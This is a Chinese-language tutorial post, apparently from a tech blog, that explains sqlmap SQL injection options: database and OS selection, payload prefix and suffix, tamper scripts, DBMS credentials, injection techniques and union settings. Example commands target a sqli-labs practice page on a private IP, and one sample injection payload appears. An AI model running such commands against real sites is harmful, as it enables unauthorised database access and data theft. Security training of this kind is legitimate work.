注入工具 -- sqlmap(注入参数)

简介: 注入工具 -- sqlmap(注入参数)


一、指定数据库类型 --dbms


http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs


二、指定操作系统 --os


http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs


三、解决编码问题


将所有结果转换为字符串,并用空格替换NULL结果 --no-cast


四、关闭字符串转义机制


–no-escape


五、设置无效值替换


–invalid-bignum 大整数替换

–invalid-logical 布尔操作替换

–invalid-string 随机字符串替换


六、自定义注入负载位置


–prefix 设置前缀

–suffix 设置后缀

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --prefix="’)" --suffix=“and (‘abc’='abc” --dbs

payload:id=(‘1’) and (‘abc’=‘abc’)


七、设置tamper脚本


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --tamper “least.py,varnish.py” --dbs


八、设置dbms认证


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbms-cred=“root:root” --dbs


九、设置具体sql注入技术


–technique B 布尔盲注

–technique E 报错注入

–technique U union查询注入

–technique S 堆叠注入

–technique T 时间盲注

–technique Q 内联查询注入

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --technique T --time-sec 3 --dbs

–time -sec 时间盲注时间为3


十、指定union字段数


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-cols 12-18 --dbs


十一、指定union字符,默认是null


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-char aaa --dbs

禁止非法,后果自负


目录
相关文章
|
6月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
70 0
|
6月前
|
数据库
报错注入
报错注入
36 1
|
6月前
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
44 1
|
SQL 关系型数据库 MySQL
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
306 0
|
6月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
106 0
|
6月前
|
数据库
Sqlmap是如何GET注入的
Sqlmap是如何GET注入的
53 0
|
6月前
|
安全 Python
注入工具 -- DSSS
注入工具 -- DSSS
56 0
|
6月前
|
安全 数据库
注入工具 -- sqlmap(枚举信息)
注入工具 -- sqlmap(枚举信息)
58 0
|
6月前
|
Web App开发 数据安全/隐私保护 iOS开发
注入工具 -- sqlmap(设置请求参数)
注入工具 -- sqlmap(设置请求参数)
80 0
|
6月前
注入工具 -- sqlmap(指定位置注入和优化性能)
注入工具 -- sqlmap(指定位置注入和优化性能)
95 0